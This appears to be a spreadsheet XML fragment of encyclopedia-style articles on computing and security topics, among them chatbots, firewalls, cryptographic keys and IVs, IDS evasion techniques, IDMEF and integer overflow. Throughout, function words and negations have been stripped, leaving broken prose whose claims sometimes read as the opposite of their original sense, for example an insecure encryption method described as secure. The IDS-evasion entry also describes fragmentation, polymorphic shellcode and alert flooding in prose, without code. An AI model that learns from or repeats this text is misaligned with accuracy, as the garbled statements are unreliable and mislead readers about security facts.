    <t>jabberwacky chatterbot created british programmer rollo carpenter. stated "simulate natural human chat interesting, entertaining humorous manner". early attempt creating artificial intelligence human interaction. purpose stated purpose project create artificial intelligence capable passing turing test. designed mimic human interaction carry conversations users. designed carry functions. unlike traditional programs, learning technology intended form entertainment rather used computer support systems corporate representation. recent developments allow scripted, controlled approach atop general conversational aiming bring together best approaches, usage fields sales marketing underway. ultimate intention program move text based system wholly voice operated—learning directly sound sensory inputs. creator believes incorporated objects around home robots talking pets, intending useful entertaining, keeping people company. cleverbot cleverbot evolved version older jabberwacky chatterbot, chatbot, originally launched 1997 web. jabberwacky's website tagged "legacy only." timeline 1981 first incarnation project created program hard-coded sinclair zx81. 1988 learning project founded 'thoughts' 1997 launched internet 'jabberwacky' october 2003 jabberwacky awarded third place loebner prize. beaten juergen pirner's jabberwock german-based chat program) september 2004 jabberwacky awarded second place loebner prize. beaten computer chat program a.l.i.c.e. september 2005 george, character within jabberwacky, wins loebner prize september 2006 joan, another jabberwacky character, wins loebner prize october 2008 variant jabberwacky launched, fuzzy deeper context, name cleverbot also artificial linguistic internet computer entity (alice) chatterbot loebner prize references external links www.jabberwacky.com official website jabberwacky entry loebner prize 2005</t>
  </si>
  <si>
    <t>Jailbreak (computer science)</t>
  </si>
  <si>
    <t>Sentry Firewall</t>
  </si>
  <si>
    <t>sentry firewall free open-source network firewall linux distribution first published 2001 subject multiple magazine reviews. distribution particularly notable consists solely bootable cd-rom designed used computer hard disk. configuration information retrieved boot time automatically searching attached floppy disk drive, flash memory drive, another server local network willing provide configuration. overview sentry firewall starts cd-rom immediately constructs disk computer's memory. before system fully boots, script searches removable media containing file called "sentry.conf". file found, contain detailed instructions list files copied removable media disk system finally allowed boot. cd-rom pre-loaded variety configurable network tools, including iptables. because disk created time machine boots, possible recover sort problem simply rebooting machine. from security perspective, compelling machine essentially becomes immune viruses file corruption least effects either problem can't survive reboot. configuration while basic linux familiarity necessary configure basic files necessary firewall, exists windows programs capable creating bulk configuration scripts based interaction graphical user interface. firewall builder example; program also works firewall products unrelated sentry firewall. current status according project's maintainer, sentry firewall updated since january 2005 release. external links references</t>
  </si>
  <si>
    <t>Sentry 2020</t>
  </si>
  <si>
    <t>sentry 2020 commercial software program "transparent" disk encryption pda. compatible versions, desktop windows windows mobile 6.5.3, allows using encrypted volume platforms. latest versions released february 2011. windows vista "newest" supported. also librecrypt alternative system also works pdas disk encryption disk encryption software comparison disk encryption software external links official sentry 2020 website</t>
  </si>
  <si>
    <t>Java Cryptography Architecture</t>
  </si>
  <si>
    <t>computing, java cryptography architecture (jca) framework working cryptography using java programming language. forms part java security api, first introduced java.security package. uses "provider"-based architecture contains apis various purposes, encryption, generation management, secure random-number generation, certificate validation, etc. these apis provide easy developers integrate security application code. also java cryptography extension bouncy castle (cryptography) external links official guides: javase6, javase7, javase8, javase9, javase10, javase11</t>
  </si>
  <si>
    <t>Session key</t>
  </si>
  <si>
    <t>session single-use symmetric used encrypting messages communication session. closely related term content encryption (cek), traffic encryption (tek), multicast refers used encrypting messages, contrary uses like encrypting keys (key encryption (kek) encryption made public key). session keys introduce complications system, solve real problems. there primary reasons session keys: several cryptanalytic attacks become easier material encrypted specific available. limiting amount data processed using particular key, attacks rendered harder perform. asymmetric encryption slow many purposes, secret algorithms require securely distributed. using asymmetric algorithm encrypt secret another, faster, symmetric algorithm, possible improve overall performance considerably. this process used gpg.like cryptographic keys, session keys must chosen cannot predicted attacker, usually requiring chosen randomly. failure choose session keys key) properly major (and common actual practice) design flaw crypto system. also ephemeral random number generator list cryptographic types one-time perfect forward secrecy references</t>
  </si>
  <si>
    <t>Intrusion tolerance</t>
  </si>
  <si>
    <t>intrusion tolerance fault-tolerant design approach defending information systems malicious attacks. sense, also computer security approach. abandoning conventional preventing intrusions, intrusion tolerance instead calls triggering mechanisms prevent intrusions leading system security failure. there major variants intrusion tolerance mechanisms: mechanisms based redundancy (e.g., byzantine fault tolerance); mechanisms based intrusion detection (e.g., intrusion detection system) reaction. also byzantine fault tolerance external links paulo veríssimo, nuno ferreira neves, miguel pupo correia "intrusion-tolerant architectures: concepts design"</t>
  </si>
  <si>
    <t>Intrusion detection system evasion techniques</t>
  </si>
  <si>
    <t>intrusion detection system evasion techniques modifications made attacks order prevent detection intrusion detection system (ids). almost published evasion techniques modify network attacks. 1998 paper insertion, evasion, denial service: eluding network intrusion detection popularized evasion, discussed evasion techniques areas correct interpretation ambiguous depending targeted computer system. 'fragroute' 'fragrouter' programs implement evasion techniques discussed paper. many vulnerability scanners, 'nikto', 'whisker' 'sandcat', also incorporate evasion techniques. most idss modified detect even reverse basic evasion techniques, evasion (and countering evasion) still active fields. obfuscation evaded obfuscating encoding attack payload target computer reverse not. way, attacker exploit host without alerting ids. encoding application layer protocols like http allow multiple encodings data interpreted value. example, string "cgi-bin" encoded "%63%67%69%2d%62%69%6e" (i.e., hexadecimal). server view string accordingly. must aware possible encodings hosts accept order match network traffic known-malicious sinatures.attacks encrypted protocols https cannot read unless copy private used server encrypt communication. able match encrypted traffic signatures account this. polymorphism signature-based often look common attack patterns match malicious traffic signatures. detect buffer overflow attacks, might look evidence slides used weaken protection address space layout randomization.to obfuscate attacks, attackers polymorphic shellcode create unique attack patterns. this technique typically involves encoding payload fashion (e.g., xor-ing byte 0x95), placing decoder front payload sending when target executes code, runs decoder rewrites payload original form target executes.polymorphic attacks single detectable signature, making difficult signature-based ids, even anomaly-based ids, detect. shikata ("it cannot helped") popular polymorphic encoder metasploit framework used convert malicious shellcode difficult-to-detect polymorphic shellcode using additive feedback. evasion attackers evade crafting packets host interprets attack payload correctly either interprets attack incorrectly determines traffic benign quickly. fragmentation small packets basic technique split attack payload multiple small packets, must reassemble packet stream detect attack. simple splitting packets fragmenting them, adversary also simply craft packets small payloads. 'whisker' evasion tool calls crafting packets small payloads 'session splicing'. itself, small packets evade reassembles packet streams. however, small packets modified order complicate reassembly detection. evasion technique pause sending parts attack, hoping time target computer does. second evasion technique send packets order, confusing simple packet re-assemblers target computer. overlapping fragments segments another evasion technique craft series packets sequence numbers configured overlap. example, first packet include bytes payload second packet's sequence number bytes start first packet. when target computer reassembles stream, must decide handle four overlapping bytes. some operating systems take older data, take newer data. reassemble target, manipulated either missing portion attack payload seeing benign data inserted malicious payload, breaking attack signature. this technique also used fragmentation similar manner. ambiguities some evasion techniques involve deliberately manipulating protocols target computer handle differently ids. example, urgent pointer handled differently different operating systems. handle protocol violations manner consistent hosts, vulnerable insertion evasion techniques similar mentioned earlier. low-bandwidth attacks attacks spread across long period time large number source ips, nmap's slow scan, difficult pick background benign traffic. online password cracker tests password user every look nearly identical normal user mistyped password. denial service fact passive inherently fail-open opposed fail-closed), launching denial-of-service attack network feasible method circumventing protection. adversary accomplish exploiting ids, consuming computational resources ids, deliberately triggering large number alerts disguise actual attack. exhaustion packets captured stored kernel buffer ready process them. high load, can't process packets quickly enough buffer fills (and possibly malicious) packets dropped buffer full.an attacker exhaust ids's resources number ways. example, signature-based intrusion detection systems pattern matching algorithms match incoming packets signatures known attacks. naturally, signatures computational expensive match others. exploiting fact, attacker send specially-crafted network traffic force maximum amount time possible pattern matching algorithm traffic. this algorithmic complexity attack overwhelm relatively small amount bandwidth.an also monitors encrypted traffic spend large portion resources decrypting incoming data. memory exhaustion order match certain signatures, required keep state related connections monitoring. example, must maintain "tcp control blocks" (tcbs), chunks memory track information sequence numbers, window sizes, connection states (established, related, closed, etc.), connection monitored ids. once ids's random-access memory (ram) consumed, forced utilized virtual memory hard disk much slower ram, leading performance problems dropped packets similar effects exhaustion.if garbage collect tcbs correctly efficiently, attacker exhaust ids's memory starting large number connections quickly. similar attacks made fragmenting large number packets larger number smaller packets, send large number out-of-order segments. operator fatigue alerts generated acted upon order value. attacker reduce "availability" overwhelming human operator inordinate number alerts sending large amounts "malicious" traffic intended generate alerts ids. attacker perform actual attack using alert noise cover. tools 'stick' 'snot' designed purpose. they generate large number alerts sending attack signature across network, trigger alerts maintain application protocol context. references external links evasions ids/ips, abhishek singh, virus bulletin, april 2010. insertion, evasion, denial service: eluding network intrusion detection thomas ptacek, timothy newsham. technical report, secure networks, inc., january 1998. evasion unicode eric packer. last updated january 2001. fragroute home page fragrouter source code nikto home page outdated, https://cirt.net/nikto2 phrack phile 0x03 mentioning urgent pointer whisker home page sandcat home page snort's stream4 preprocessor stateful packet reassembly evasions wild blog evasions found shadow brokers leak</t>
  </si>
  <si>
    <t>Intrusion Detection Message Exchange Format</t>
  </si>
  <si>
    <t>used part computer security, idmef (intrusion detection message exchange format) data format used exchange information software enabling intrusion detection, intrusion prevention, security information collection management systems need interact them. idmef messages designed processed automatically. details format described 4765. this presents implementation data model associated dtd. requirements format described 4766, recommended transport protocol (idxp) documented 4767 idmef purpose idmef define data formats exchange procedures sharing information interest intrusion detection response systems management systems need interact them. used computer security incidents reporting exchanging. intended easy automatic processing. idmef well-structured object-oriented format, consists classes containing fields, including three mandatory: classification unique login date creation alert.there currently types idmef messages created, heartbeat alert heartbeat heartbeats sent analyzers indicate status. these messages sent regular intervals period defined heartbeat interval field. none messages received several periods time, consider analyzer able trigger alerts. alert alerts used describe attack took place, main areas create alert are: createtime: date creation alert detecttime: alert detection time analyzer analyzertime: time alert sent analyzer source: details origin attack service, user, process node target: details target attack service, user, process node file classification: name attack references, cves assessment: evaluation attack (severity, potential impact, etc.) additionaldata: additional information attackthere three alert types inherit scheme: correlationalert: grouping alerts related another toolalert: alerts grouping tool overflowalert: alert resulting attack so-called buffer overflow example idmef report ping death attack look follows: tools implementing idmef protocol prelude (intrusion detection system) nids snort nids suricata ([1]) hids ossec ([2]) hids samhain ([3]) sagan barnyard orchids libprelude part prelude project, libprelude permits communicate agents using idmef format. libprelude coded multiple bindings available (python, lua, perl, etc.). used open-source tools. libidmef libidmef implementation ietf (internet engineering task force), idwg intrusion detection exchange format charter working group), draft standard idmef protocol. idmef framework dotnet dotnet library create idmef objects export xml. dilca distributed idmef logical correlation architecture dilca distributed logical correlation reaction architecture featuring collection correlation idmef formatted events (intrusion detection message exchange format 4765) multi-step signature based system. xml::idmef perl module building/parsing idmef messages idmef.pm interface simply creating parsing idmef messages. idmef based protocol designed mainly representing intrusion detection (ids) alert messages. other module creating/parsing idmef messages snort idmef plugin snort idmef idmef plugin snort output alert events form idmef messages. plugin compatible snort broccoli server send idmef alerts prelude converter idmef format idmef parser idmef alerting library distributed idps competing frameworks many telecommunications network elements produce security alarms address intrusion detection conformance international standards. these security alarms inserted normal alarm stream, seen acted upon immediately personnel network operations center. references external links english) 4765, intrusion detection message exchange format (idmef) english) 4766, intrusion detection message exchange requirements (idmef) english) 4767, intrusion detection exchange protocol (idxp) english) pravin kothari, intrusion detection interoperability standardization, sans institute infosec reading room, février 2002 english) secef, project promotion idmef iodef formats tutorials formats, quick introduction alert formats comparison alert formats, long comparison existing formats (cef, leef, sdee, etc.) format idmef, detailed description idmef format format sdee, detailed schema sdee format idmef, tutorial idmef content libprelude, detailed tutorial libprelude code idmef client (python, ruby, etc.) build sensor, detailed tutorial create sensor communicate idmef libprelude library. libprelude idmef, detailed description idmef fields</t>
  </si>
  <si>
    <t>Initialization vector</t>
  </si>
  <si>
    <t>cryptography, initialization vector (iv) starting variable (sv) input cryptographic primitive used provide initial state. typically required random pseudorandom, sometimes needs unpredictable unique. randomization crucial encryption schemes achieve semantic security, property whereby repeated usage scheme allow attacker infer relationships (potentially similar) segments encrypted message. block ciphers, described modes operation. some cryptographic primitives require non-repeating, required randomness derived internally. case, commonly called nonce (number used once), primitives (e.g. cbc) considered stateful rather randomized. this need explicitly forwarded recipient derived common state updated sender receiver side. practice, short nonce still transmitted along message consider message loss.) example stateful encryption schemes counter mode operation, sequence number nonce. size depends cryptographic primitive used; block ciphers generally cipher's block-size. encryption schemes, unpredictable part best size compensate time/memory/data tradeoff attacks. when chosen random, probability collisions birthday problem must taken account. traditional stream ciphers support explicit input, custom solution incorporating cipher's internal state needed. some designs realized practice known insecure; protocol notable example, prone related-iv attacks. motivation block cipher basic primitives cryptography, frequently used data encryption. however, itself, used encode data block predefined size, called block size. example, single invocation algorithm transforms 128-bit plaintext block ciphertext block bits size. key, given input cipher, defines mapping plaintext ciphertext. data arbitrary length encrypted, simple strategy split data blocks matching cipher's block size, encrypt block separately using key. this method secure equal plaintext blocks transformed equal ciphertexts, third party observing encrypted data easily determine content even knowing encryption key. hide patterns encrypted data avoiding re-issuing block cipher invocation, method needed randomize input data. 1980, nist published national standard document designated federal information processing standard (fips) specified four so-called block cipher modes operation, describing different solution encrypting input blocks. first mode implements simple strategy described above, specified electronic codebook (ecb) mode. contrast, modes describe process ciphertext block encryption step gets intermixed data next encryption step. initiate process, additional input value required mixed first block, referred initialization vector. example, cipher-block chaining (cbc) mode requires unpredictable value, size equal cipher's block size, additional input. this unpredictable value added first plaintext block subsequent encryption. turn, ciphertext produced first encryption step added second plaintext block, ultimate goal encryption schemes provide semantic security: property, practically impossible attacker draw knowledge observed ciphertext. shown three additional modes specified nist semantically secure so-called chosen-plaintext attacks. properties properties depend cryptographic scheme used. basic requirement uniqueness, means reused key. block ciphers, repeated values devolve encryption scheme electronic codebook mode: equal equal plaintext result equal ciphertext. stream cipher encryption uniqueness crucially important plaintext trivially recovered otherwise. example: stream ciphers encrypt plaintext ciphertext deriving stream given computing assume attacker observed messages encrypted then knowledge either reveals plaintext since p2.many schemes require unpredictable adversary. this effected selecting random pseudo-randomly. schemes, chance duplicate negligible, effect birthday problem must considered. uniqueness requirement, predictable allow recovery (partial) plaintext. example: consider scenario legitimate party called alice encrypts messages using cipher-block chaining mode. consider adversary called observe encryptions able forward plaintext messages alice encryption words, capable chosen-plaintext attack). assume alice sent message consisting initialization vector starting ciphertext block calice. palice denote first plaintext block alice's message, denote encryption, peve eve's guess first plaintext block. now, determine initialization vector next message able test guess forwarding plaintext message alice starting (iv2 peve); guess correct plaintext block encrypted calice alice. this following simple observation: calice e(iv1 palice) e(iv2 (iv2 palice)).depending whether cryptographic scheme must random unique scheme either called randomized stateful. while randomized schemes always require chosen sender forwarded receivers, stateful schemes allow sender receiver share common state, updated predefined sides. block ciphers block cipher processing data usually described mode operation. modes primarily defined encryption well authentication, though newer designs exist combine security solutions so-called authenticated encryption modes. while encryption authenticated encryption modes usually take matching cipher's block size, authentication modes commonly realized deterministic algorithms, zero fixed value. stream ciphers stream ciphers, loaded keyed internal secret state cipher, number cipher rounds executed prior releasing first output. performance reasons, designers stream ciphers keep number rounds small possible, determining minimal secure number rounds stream ciphers trivial task, considering issues entropy loss, unique cipher construction, related-ivs iv-related attacks known security issue stream ciphers, makes loading stream ciphers serious concern subject ongoing research. 802.11 encryption algorithm called (short wired equivalent privacy) used short, 24-bit leading reused key, easily cracked. packet injection allowed cracked times short several seconds. this ultimately deprecation wep. cipher-block chaining mode (cbc mode), need secret, must unpredictable particular, given plaintext, must possible predict associated plaintext advance generation iv.) encryption time. additionally output feedback mode (ofb mode), must unique. particular, (previously) common practice re-using last ciphertext block message next message insecure (for example, method used 2.0). attacker knows previous block ciphertext) specifies next plaintext, check guess plaintext block encrypted before. this known attack, also called beast attack. also cryptographic nonce padding (cryptography) random seed salt (cryptography) block cipher modes operation ciphersaber (rc4 references further reading schneier, (1996). applied cryptography (2nd ed.). york: wiley. isbn 978-0-471-12845-8. ferguson, schneier, (2003). practical cryptography. york: wiley. isbn 978-0-471-22894-3.</t>
  </si>
  <si>
    <t>InstallFree</t>
  </si>
  <si>
    <t>installfree inc. privately held company, backed ignition partners trilogy equity partners, headquarters stamford, offices located worldwide. installfree specializes application virtualization delivery, based proprietary application virtualization technology works variety microsoft windows platforms windows windows vista, windows windows server 2003, windows server 2008, terminal server citrix xenapp. history installfree founded early 2006 yori gabay (now ceo) netzer shlomai (now cto), former employees gteko ltd, automated support company acquired microsoft november 2006 $120 million. installfree launched first product, bridge suite version 1.0, april 2008, issued second release september 2008 shortly securing $8.5 million financing ignition partners trilogy equity partners. december 2012, watchdox acquired installfree. products installfree bridge clientless serverless platform allows deployment streaming fully downloaded virtual applications variety windows-based platforms. utilizes virtual management console datacenter virtual agent end-point. virtual agent, runs end-points without installation process, assimilates runtime installfree virtual (ifv) applications host environment’s shell binds virtual non-virtual applications, without using registry redirects similar intrusive methods. installfree bridge used within domain well un-managed non-domain computers, works agnostically windows windows vista, windows terminal server citrix xenapp without re-packaging configuring application system.installfree minibridge produces light weight executables, upon activation bootstrap virtual application downloading/streaming components central location. installfree minibridge executables distributed using existing electronic software distribution (esd) utilities microsoft's system center configuration manager based software distribution platforms. installfree minibridge used within domain, eliminating piracy concerns associated competing solutions. works agonistically windows windows vista, windows terminal server, systancia applidis fusion citrix xenapp without re-packaging configuring application system.installfree desktop entire virtual desktop operates existing desktop operating system works complete separation require installed components virtual machine-based technology. also application virtualization portable application creators desktop virtualization service-oriented architecture software service references external links installfree demos youtube application virtualization solution overview feature compare matrix</t>
  </si>
  <si>
    <t>Installer.app</t>
  </si>
  <si>
    <t>installer.app freeware software installer iphone created nullriver later maintained ripdev, first released summer 2007 maintained summer 2009. installer allowed users install third-party applications iphone's applications directory native applications kept. users could install applications variety sources (over wi-fi umts) provided software developers directly onto iphone without requiring computer. users could browse lists applications inside installer find ones wanted install. june 2009, ripdev dropped support installer favor developing different package manager installer named icy. releases iphone when firmware released, framework changes present. applications compiled iphone longer able 2.0. therefore, installer available vast majority users switched cydia. time, ripdev (russian iphone development) took installer project started developing installer 4.0. when installer finished, added quickpwn software payload. installer gain much popularity installer jailbreak users become accustomed using cydia. 2011, team developers called infini-dev recreated installer could above, although main current repositories compatible cydia longer compatible installer. ripdev installer repo back online since infini-dev released installer, also repos like greek-iphone offer date packages installer. installer 2014, slava karpenko announced project work installer later, karpenko revealed infini-dev dropped project. infini-dev took moved project apptapp team name. public beta released july 2019, officially launched january 2020. references external links https://apptapp.me/ official website https://web.archive.org/web/20090215004107/http://ripdev.com/installer ripdev's website http://iphone.nullriver.com/beta/ nullriver's website http://www.tropgeek.com/news/comment+installer+la+beta+3+d%e2%80%99ios+8+sans+enregistrer+son+iphone+aupr%c3%a8s+d%e2%80%99apple+%3f nullriver's article</t>
  </si>
  <si>
    <t>Integer overflow</t>
  </si>
  <si>
    <t>computer programming, integer overflow occurs arithmetic operation attempts create numeric value outside range represented given number digits either higher maximum lower minimum representable value. common result overflow least significant representable digits result stored; result said wrap around maximum (i.e. modulo power radix, usually modern computers, sometimes another radix). overflow condition give results leading unintended behavior. particular, possibility anticipated, overflow compromise program's reliability security. applications, timers clocks, wrapping overflow desirable. standard states unsigned integers, modulo wrapping defined behavior term overflow never applies: computation involving unsigned operands never overflow."on processors like graphics processing units (gpus) digital signal processors (dsps) support saturation arithmetic, overflowed results would "clamped", i.e. minimum maximum value representable range, rather wrapped around. origin register width processor determines range values represented registers. though vast majority computers perform multiple-precision arithmetic operands memory, allowing numbers arbitrarily long overflow avoided, register width limits sizes numbers operated (e.g., added subtracted) using single instruction operation. typical binary register widths unsigned integers include: 4-bit: maximum representable value 8-bit: maximum representable value 16-bit: maximum representable value 65,535 32-bit: maximum representable value 4,294,967,295 (the common width personal computers 2005), 64-bit: maximum representable value 18,446,744,073,709,551,615 (the common width personal computer central processing units (cpus), 2021), 128-bit: maximum representable value 2128 340,282,366,920,938,463,463,374,607,431,768,211,455when unsigned arithmetic operation produces result larger maximum n-bit integer, overflow reduces result modulo n-th power retaining least significant bits result effectively causing wrap around. particular, multiplying adding integers result value unexpectedly small, subtracting small integer cause wrap large positive value (for example, 8-bit integer addition results similarly subtraction results 255, two's complement representation −1). such wraparound cause security detriments—if overflowed value used number bytes allocate buffer, buffer allocated unexpectedly small, potentially leading buffer overflow which, depending buffer, might turn cause arbitrary code execution. variable signed integer type, program make assumption variable always contains positive value. integer overflow cause value wrap become negative, violates program's assumption lead unexpected behavior (for example, 8-bit integer addition results −128, two's complement 128). solution particular problem unsigned integer types values program expects assumes never negative.) flags most computers dedicated processor flags check overflow conditions. carry flag result addition subtraction, considering operands result unsigned numbers, given number bits. this indicates overflow carry borrow significant bit. immediately following carry subtract borrow operation would contents flag modify register memory location contains higher part multi-word value. overflow flag result operation signed numbers sign would predict signs operands, e.g., negative result adding positive numbers. this indicates overflow occurred signed result represented two's complement form would given number bits. definition variations ambiguity unsigned type, ideal result operation outside type's representable range returned result obtained wrapping, event commonly defined overflow. contrast, standard defines event overflow states computation involving unsigned operands never overflow."when ideal result integer operation outside type's representable range returned result obtained clamping, event commonly defined saturation. varies whether saturation overflow. eliminate ambiguity, terms wrapping overflow saturating overflow used. term underflow commonly used floating-point math integer math. but, many references found integer underflow. when term integer underflow used, means ideal result closer minus infinity output type's representable value closest minus infinity. when term integer underflow used, definition overflow include types overflows, include cases ideal result closer positive infinity output type's representable value closest positive infinity. when ideal result operation exact integer, meaning overflow ambiguous edge cases. consider case ideal result value 127.25 output type's maximum representable value 127. overflow defined ideal value outside representable range output type, case would classified overflow. operations well defined rounding behavior, overflow classification need postponed rounding applied. standard defines conversions floating point integer must round toward zero. used convert floating point value 127.25 integer, rounding applied first give ideal integer output 127. since rounded integer outputs range, standard would classify conversion overflow. inconsistent behavior behavior occurrence overflow consistent circumstances. example, language rust, functionality provided give users choice control, behavior basic mathematic operators naturally fixed; however, fixed behavior differs program built 'debug' mode built 'release' mode. unsigned integer overflow defined wrap around, signed integer overflow causes undefined behavior. methods address integer overflow problems detection run-time overflow detection implementation ubsan available compilers. java overloaded methods, example like math.addexact(int, int), throw arithmeticexception case overflow. computer emergency response team (cert) developed as-if infinitely ranged (air) integer model, largely automated mechanism eliminate integer overflow truncation c/c++ using run-time error handling. avoidance allocating variables data types large enough contain values possibly computed stored them, always possible avoid overflow. even available space fixed data types provided programming language environment limited allow variables defensively allocated generous sizes, carefully ordering operations checking operands advance, often possible ensure priori result never larger stored. static analysis tools, formal verification design contract techniques used confidently robustly ensure overflow cannot accidentally result. handling anticipated overflow occur, tests inserted program detect happens, happen, processing mitigate example, important result computed user input overflows, program stop, reject input, perhaps prompt user different input, rather program proceeding invalid overflowed input probably malfunctioning consequence. this full process automated: possible automatically synthesize handler integer overflow, handler example, clean exit.cpus generally detect support addition numbers larger register size, typically using status bit. technique called multiple-precision arithmetic. thus, possible numbers bytes wide using byte addition steps: first bytes high bytes, necessary carry bytes arithmetic overflow byte addition becomes necessary detect increment high bytes. handling possible overflow calculation sometimes present choice performing check calculation determine whether overflow going occur), consider whether likely occurred based resulting value). caution shown towards latter choice. firstly, since reliable detection method (for example, addition necessarily wrap lower value). secondly, occurrence overflow cases undefined behavior. language, overflow unsigned integer types results wrapping, however overflow signed integer types undefined behavior; consequently compiler free assume programmer ensured signed overflow cannot possibly occur thus silently optimise check subsequent calculation involves checking result detect without giving programmer warning done. thus advisable always prefer implement checks calculations them. explicit propagation value large stored assigned special value indicating overflow occurred successive operations return flag value. such values sometimes referred nan, "not number". this useful problem checked long calculation rather step. this often supported floating-point hardware called fpus. programming language support programming languages implement various mitigation methods accidental overflow: ada, seed7 (and certain variants functional languages), trigger exception condition overflow, python (since 2.4) seamlessly converts internal representation number match growth, eventually representing long whose ability limited available memory.in languages native support arbitrary-precision arithmetic type safety (such python, smalltalk, common lisp), numbers promoted larger size automatically overflows occur, exceptions thrown (conditions signaled) range constraint exists. using languages thus helpful mitigate issue. however, languages, situations still possible integer overflow occur. example explicit optimization code path considered bottleneck profiler. case common lisp, possible using explicit declaration type-annotate variable machine-size word (fixnum) lower type safety level zero particular code block.in stark contrast older languages newer languages rust, provide built-in functions allow easy detection user choice overflow handled case case. rust, basic mathematic operators naturally lacks flexibility, users alternatively perform calculations methods provided integer primitive types. these methods give users several choices performing checked overflowing) operation (which indicates whether overflow occurred return type); 'unchecked' operation; operation performs wrapping, operation performs saturation numeric bounds. saturated arithmetic computer graphics signal processing, typical work data ranges example, take grayscale image represents black, represents white, values in-between represent shades gray. operation want support brightening image multiplying every pixel constant. saturated arithmetic allows blindly multiply every pixel constant without worrying overflow sticking reasonable outcome pixels larger (i.e., "brighter white") become white values "darker black" become black. examples unanticipated arithmetic overflow fairly common cause program errors. such overflow bugs hard discover diagnose manifest large input data sets, less likely used validation tests. taking arithmetic mean numbers adding dividing two, done many search algorithms, causes error (although resulting mean) large represented hence overflows.an unhandled arithmetic overflow engine steering software primary cause crash 1996 maiden flight ariane rocket. software considered bug-free since used many previous flights, used smaller rockets generated lower acceleration ariane frustratingly, part software overflow error occurred even required running ariane time caused rocket fail: launch-regime process smaller predecessor ariane remained software adapted rocket. further, true cause failure flaw engineering specification software dealt overflow detected: diagnostic dump bus, would connected test equipment software testing development connected rocket steering motors flight; data dump drove engine nozzle hard side rocket aerodynamic control precipitated rapid breakup air.on april 2015, u.s. federal aviation administration announced order boeing operators reset electrical system periodically, avoid integer overflow could lead loss electrical power turbine deployment, boeing deployed software update fourth quarter. european aviation safety agency followed 2015. error happens centiseconds (about days), indicating 32-bit signed integer. overflow bugs evident computer games. super mario bros. nes, stored number lives signed byte (ranging -128 127) meaning player safely lives, player reaches 128th life causes counter roll zero (although number counter glitched happens) dies, instant game over. this caused data overflow, developers thought said number lives could earned. arcade game donkey kong, impossible advance past level integer overflow time/bonus. game takes level number user multiplies adds when reach level time/bonus number 260, large 8-bit value register, resets gives remaining time/bonus short finish level. donkey kong math, trying calculate number 10,000, shows first digits. overflow cause famous "split-screen" level pac-man. notorious nuclear gandhi civilization purportedly caused integer underflow occurred game attempted subtract gandhi's default aggression level setting 255, nearly times higher normal maximum (sid meier claimed interview was, fact, intentional.) such also caused lands minecraft existed infdev development period beta 1.7.3; later fixed beta still exists minecraft pocket edition windows edition. super nintendo entertainment system (nes) game lamborghini american challenge, player cause amount money drop race fined limit remaining money paying race, glitches integer grants player $65,535,000 would going negative. similar glitch occurs s.t.a.l.k.e.r.: clear player drop negative amount fast travelling without sufficient funds, proceeding event player gets robbed currency taken away. after game attempts take player's money away amount player granted 2147482963 game currency. ibm–microsoft macro assembler (masm) version 1.00, likely programs built pascal compiler, integer overflow signedness error stack setup code, prevented running newer machines emulators common configurations memory. program either hangs displays error message exits dos.in august 2016, casino machine resorts world casino printed prize ticket $42,949,672.76 result overflow bug. casino refused amount, calling malfunction, using defense machine clearly stated maximum payout $10,000, prize exceeding result programming bug. york state gaming commission ruled favor casino. also buffer overflow heap overflow modular arithmetic pointer swizzling software testing stack buffer overflow static program analysis unix signal references external links phrack #60, basic integer overflows phrack #60, loop integer protection efficient accurate detection integer-based attacks wasc threat classification integer overflows understanding integer overflow c/c++ binary overflow binary arithmetic standard</t>
  </si>
  <si>
    <t>Integral cryptanalysis</t>
  </si>
  <si>
    <t>cryptography, integral cryptanalysis cryptanalytic attack particularly applicable block ciphers based substitution–permutation networks. originally designed lars knudsen dedicated attack square, commonly known square attack. also extended ciphers related square: crypton, rijndael, shark. stefan lucks generalized attack called saturation attack used attack twofish, similar square, radically different feistel network structure. forms integral cryptanalysis since applied variety ciphers, including hierocrypt, idea, camellia, skipjack, misty1, misty2, safer++, khazad, (now called idea nxt). unlike differential cryptanalysis, uses pairs chosen plaintexts fixed difference, integral cryptanalysis uses sets even multisets chosen plaintexts part held constant another part varies possibilities. example, attack might chosen plaintexts bits same, differ bits. such necessarily sums corresponding sets ciphertexts provide information cipher's operation. this contrast differences pairs texts sums larger sets texts inspired name "integral cryptanalysis", borrowing terminology calculus. references joan daemen, lars knudsen, vincent rijmen (january 1997). block cipher square (pdf). international workshop fast software encryption (fse '97), volume 1267 lecture notes computer science. haifa: springer-verlag. 149–165. retrieved 2007-02-15.{{cite conference}}: maint: multiple names: authors list (link) carl d'halluin, gert bijnens, vincent rijmen, bart preneel (march 1999). attack rounds crypton (pdf/postscript). international workshop fast software encryption (fse '99). rome: springer-verlag. 46–59. retrieved 2007-03-03.{{cite conference}}: maint: multiple names: authors list (link) ferguson, kelsey, lucks, schneier, stay, wagner, whiting (april 2000). improved cryptanalysis rijndael (pdf/postscript). international workshop fast software encryption (fse 2000). york city: springer-verlag. 213–230. retrieved 2007-03-06.{{cite conference}}: maint: multiple names: authors list (link) stefan lucks (september 2000). saturation attack bait twofish (pdf/postscript). international workshop fast software encryption (fse '01). yokohama: springer-verlag. 1–15. retrieved 2006-11-30. paulo barreto, vincent rijmen, jorge nakahara, jr., bart preneel, joos vandewalle, yong (april 2001). improved square attacks reduced-round hierocrypt (pdf). international workshop fast software encryption (fse '01). yokohama: springer-verlag. 165–173. retrieved 2007-03-03.{{cite conference}}: maint: multiple names: authors list (link) jorge nakahara, jr.; paulo s.l.m. barreto; bart preneel; joos vandewalle; (2001). "square attacks reduced-round idea block ciphers" (pdf/postscript). retrieved 2007-03-03. {{cite journal}}: cite journal requires |journal= (help) yongjin yeom; sangwoo park; iljun (february 2002). security camellia square attack (pdf). international workshop fast software encryption (fse '02). leuven: springer-verlag. 89–99. retrieved 2007-03-03. kyungdeok hwang; wonil lee; sungjae lee; sangjin lee; jongin (february 2002). saturation attacks reduced round skipjack. international workshop fast software encryption (fse '02). leuven: springer-verlag. 100–111. archived original (pdf) 2007-05-25. retrieved 2007-03-03. lars knudsen; david wagner (december 2001). integral cryptanalysis (pdf/postscript). international workshop fast software encryption (fse '02). leuven: springer-verlag. 112–127. retrieved 2006-11-30. gilles piret, jean-jacques quisquater (february 2003). "integral cryptanalysis reduced-round safer++" (pdf/postscript). retrieved 2007-03-03. {{cite journal}}: cite journal requires |journal= (help) frédéric muller (december 2003). attack khazad. advances cryptology asiacrypt 2003. taipei: springer-verlag. 347–358. archived original (pdf) 2007-07-23. retrieved 2007-03-03. wenling; zhang wentao; feng dengguo (august 2005). "improved integral cryptanalysis block cipher" (pdf). retrieved 2007-03-03. {{cite journal}}: cite journal requires |journal= (help)</t>
